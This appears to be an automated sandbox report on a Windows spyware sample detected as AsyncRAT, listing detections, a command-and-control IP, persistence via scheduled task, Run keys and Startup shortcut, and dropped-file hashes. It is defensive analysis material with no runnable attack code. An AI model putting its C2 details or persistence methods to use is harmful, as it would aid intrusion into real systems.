                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Modify Registry
                    DCSync1
                    System Network Configuration Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                    Virtualization/Sandbox Evasion
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                    Process Injection
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565292 Sample: file.exe Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 40 ip-api.com 2->40 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 14 other signatures 2->52 8 file.exe 16 6 2->8         started        13 Word.exe 2->13         started        15 Word.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 42 103.230.121.124, 49806, 49829, 7000 VPSQUANUS Hong Kong 8->42 44 ip-api.com 208.95.112.1, 49699, 80 TUT-ASUS United States 8->44 38 C:\Users\user\AppData\Roaming\Word.exe, PE32 8->38 dropped 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->56 58 Protects its processes via BreakOnTermination flag 8->58 60 Bypasses PowerShell execution policy 8->60 68 3 other signatures 8->68 19 powershell.exe 21 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 22 8->24         started        26 2 other processes 8->26 62 Antivirus detection for dropped file 13->62 64 Multi AV Scanner detection for dropped file 13->64 66 Machine Learning detection for dropped file 13->66 file6 signatures7 process8 signatures9 54 Loading BitLocker PowerShell Module 19->54 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe76%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                    file.exe100%AviraTR/Spy.Gen
                    file.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Word.exe100%AviraTR/Spy.Gen
                    C:\Users\user\AppData\Roaming\Word.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Word.exe76%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://www.microsoft.co~0%Avira URL Cloudsafe
                    103.230.121.1240%Avira URL Cloudsafe
                    http://osoft.co0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ip-api.com
                    208.95.112.1
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      103.230.121.124true
                      • Avira URL Cloud: safe
                      unknown
                      http://ip-api.com/line/?fields=hostingfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1321120516.0000022D4B1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1438468730.000001D1614B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1588201996.000001661006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://crl.mpowershell.exe, 0000000B.00000002.1451558022.000001D169939000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1827907029.0000024E3F432000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.1304950670.0000022D3B3A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D1517F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.1304950670.0000022D3B3A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D1517F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1321120516.0000022D4B1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1438468730.000001D1614B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1588201996.000001661006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Licensepowershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.micpowershell.exe, 00000010.00000002.1824109278.0000024E3F346000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/Iconpowershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://osoft.copowershell.exe, 00000007.00000002.1335289999.0000022D539F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://crl.micft.cMicRosofpowershell.exe, 00000010.00000002.1824109278.0000024E3F346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://aka.ms/pscore68powershell.exe, 00000007.00000002.1304950670.0000022D3B181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D151441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26C91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.microsoft.cpowershell.exe, 0000000B.00000002.1451558022.000001D169961000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.microsoft.co~powershell.exe, 0000000E.00000002.1615577139.0000016677A06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.2523388920.0000000002681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1304950670.0000022D3B181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D151441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26C91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        208.95.112.1
                                                        ip-api.comUnited States
                                                        53334TUT-ASUSfalse
                                                        103.230.121.124
                                                        unknownHong Kong
                                                        62468VPSQUANUStrue
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1565292
                                                        Start date and time:2024-11-29 15:18:09 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 6m 36s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:27
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:file.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@20/21@1/2
                                                        EGA Information:
                                                        • Successful, ratio: 11.1%
                                                        HCA Information:
                                                        • Successful, ratio: 99%
                                                        • Number of executed functions: 128
                                                        • Number of non-executed functions: 8
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target Word.exe, PID 316 because it is empty
                                                        • Execution Graph export aborted for target Word.exe, PID 4016 because it is empty
                                                        • Execution Graph export aborted for target Word.exe, PID 4308 because it is empty
                                                        • Execution Graph export aborted for target Word.exe, PID 8184 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 7020 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 7348 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 7628 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 7872 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • VT rate limit hit for: file.exe
                                                        TimeTypeDescription
                                                        09:19:05API Interceptor68475x Sleep call for process: file.exe modified
                                                        09:19:09API Interceptor57x Sleep call for process: powershell.exe modified
                                                        11:14:31API Interceptor4x Sleep call for process: Word.exe modified
                                                        17:14:30Task SchedulerRun new task: Word path: C:\Users\user\AppData\Roaming\Word.exe
                                                        17:14:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Word C:\Users\user\AppData\Roaming\Word.exe
                                                        17:14:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Word C:\Users\user\AppData\Roaming\Word.exe
                                                        17:14:51AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Word.lnk
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        208.95.112.1Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        8FloezlGW7.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                        • ip-api.com/json/?fields=225545
                                                        Orden de compra.pdf______________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        Pedido_4502351226_de Compa#U00f1#U00eda Anno S.A..exeGet hashmaliciousAgentTeslaBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        word.exeGet hashmaliciousXWormBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        svchost.exeGet hashmaliciousXWormBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        Chrome.exeGet hashmaliciousXWormBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        Registry.exeGet hashmaliciousXWormBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        OC LICITACI#U00d3N DICIEMBRE_24.exeGet hashmaliciousAgentTeslaBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        VzhY4BcvBH.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, VenomRATBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        103.230.121.124word.exeGet hashmaliciousXWormBrowse
                                                          svchost.exeGet hashmaliciousXWormBrowse
                                                            Chrome.exeGet hashmaliciousXWormBrowse
                                                              Registry.exeGet hashmaliciousXWormBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                ip-api.comEnquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                8FloezlGW7.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                • 208.95.112.1
                                                                https://www.scrolldroll.com/best-dialogues-from-asur/Get hashmaliciousUnknownBrowse
                                                                • 208.95.112.2
                                                                Orden de compra.pdf______________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                Pedido_4502351226_de Compa#U00f1#U00eda Anno S.A..exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                word.exeGet hashmaliciousXWormBrowse
                                                                • 208.95.112.1
                                                                svchost.exeGet hashmaliciousXWormBrowse
                                                                • 208.95.112.1
                                                                Chrome.exeGet hashmaliciousXWormBrowse
                                                                • 208.95.112.1
                                                                Registry.exeGet hashmaliciousXWormBrowse
                                                                • 208.95.112.1
                                                                OC LICITACI#U00d3N DICIEMBRE_24.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                VPSQUANUSword.exeGet hashmaliciousXWormBrowse
                                                                • 103.230.121.124
                                                                svchost.exeGet hashmaliciousXWormBrowse
                                                                • 103.230.121.124
                                                                Chrome.exeGet hashmaliciousXWormBrowse
                                                                • 103.230.121.124
                                                                Registry.exeGet hashmaliciousXWormBrowse
                                                                • 103.230.121.124
                                                                qkbfi86.elfGet hashmaliciousMiraiBrowse
                                                                • 103.252.19.63
                                                                amen.arm.elfGet hashmaliciousUnknownBrowse
                                                                • 43.225.59.17
                                                                AIYi17AyGz.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                                                • 198.44.176.141
                                                                o88dYvhfkt.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                • 156.224.21.148
                                                                file.exeGet hashmaliciousSliverBrowse
                                                                • 198.44.168.104
                                                                sBX8VM67ZE.exeGet hashmaliciousFormBookBrowse
                                                                • 23.251.54.212
                                                                TUT-ASUSEnquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                8FloezlGW7.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                • 208.95.112.1
                                                                https://www.scrolldroll.com/best-dialogues-from-asur/Get hashmaliciousUnknownBrowse
                                                                • 208.95.112.2
                                                                Orden de compra.pdf______________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                Pedido_4502351226_de Compa#U00f1#U00eda Anno S.A..exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                word.exeGet hashmaliciousXWormBrowse
                                                                • 208.95.112.1
                                                                svchost.exeGet hashmaliciousXWormBrowse
                                                                • 208.95.112.1
                                                                Chrome.exeGet hashmaliciousXWormBrowse
                                                                • 208.95.112.1
                                                                Registry.exeGet hashmaliciousXWormBrowse
                                                                • 208.95.112.1
                                                                OC LICITACI#U00d3N DICIEMBRE_24.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                No context
                                                                No context
                                                                Process:C:\Users\user\AppData\Roaming\Word.exe
                                                                File Type:CSV text
                                                                Category:dropped
                                                                Size (bytes):654
                                                                Entropy (8bit):5.380476433908377
                                                                Encrypted:false
                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Preview:@...e...........................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):41
                                                                Entropy (8bit):3.7195394315431693
                                                                Encrypted:false
                                                                SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                Malicious:false
                                                                Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
